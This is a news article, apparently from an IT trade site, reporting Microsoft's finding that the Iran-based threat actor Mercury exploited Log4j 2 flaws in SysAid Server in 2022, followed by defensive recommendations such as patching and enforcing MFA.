Microsoft: Iranian Threat Actor Exploits Log4j 2 Vulnerabilities in SysAid Apps
The Microsoft Threat Intelligence Center (MSTIC) and Microsoft 365 Defender Research Team have found that Iran-based threat actor Mercury has been exploiting Log4j 2 vulnerabilities in SysAid applications, according to a prepared statement.
MSPs use SysAid for IT service management (ITSM), ticket automation, task automation, asset management and patch management.
A Closer Look at the Log4j 2 Vulnerabilities in SysAid Apps
MSTIC observed a Mercury threat actor exploiting vulnerable SysAid Server instances as its initial access vector on July 23 and 25, 2022. After the threat actor accessed these instances, it was able to dump user credentials, move laterally within the targeted organization and initiate a hands-on keyboard attack.
In addition, the Mercury threat actor exploited Log4j 2 vulnerabilities to penetrate vulnerable SysAid Server instances, MSTIC reported. This has allowed the threat actor to attack organizations across Israel.
Meanwhile, the Mercury SysAid Server attacks may be associated with Iran’s Ministry of Intelligence and Security. They come after a Mercury threat actor used Log4j 2 exploits to attack VMware applications in 2022.
Protecting Against Log4j 2 Vulnerabilities in SysAid Apps
MSTIC offers several recommendations to help organizations guard against Log4j 2 vulnerabilities in SysAid apps, including:
- Find out if SysAid apps are in use; if so, apply security patches and updates to these apps.
- Review authentication activity for remote access and investigate any anomalous activity.
- Enable multi-factor authentication (MFA) to mitigate compromised credentials and ensure that MFA is enforced across all remote users.
SysAid also has released a workaround to help users address Log4j 2 vulnerabilities in its apps. It has fixed the cloud and on-premises versions of its software and continues to monitor the situation and adapt accordingly.